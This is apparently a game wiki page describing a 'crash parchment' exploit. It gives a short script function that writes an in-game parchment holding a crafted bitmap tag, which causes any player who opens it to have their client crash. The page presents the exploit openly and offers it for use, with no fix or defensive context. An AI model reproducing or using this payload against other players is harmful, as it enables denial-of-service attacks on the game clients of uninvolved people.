Skip to content

Crash Parchment

A parchment exploit that can cause a player's game client to crash when they try to read the parchment.

Summary

  • Effect: opening the malicious parchment crashes the reader's client.
  • Type: denial-of-service style client crash.
  • Attributed discovery: Dark Silence.

Notes

Code

// put parchment in quickslot 9 adnd run this function
function createCrashParchments()
{
   commandToServer('writeParchment', $quickslot9.serverid, "Anonymous's Note", "<bitmap:base/data/fx/lightning/lightning.dml>");
}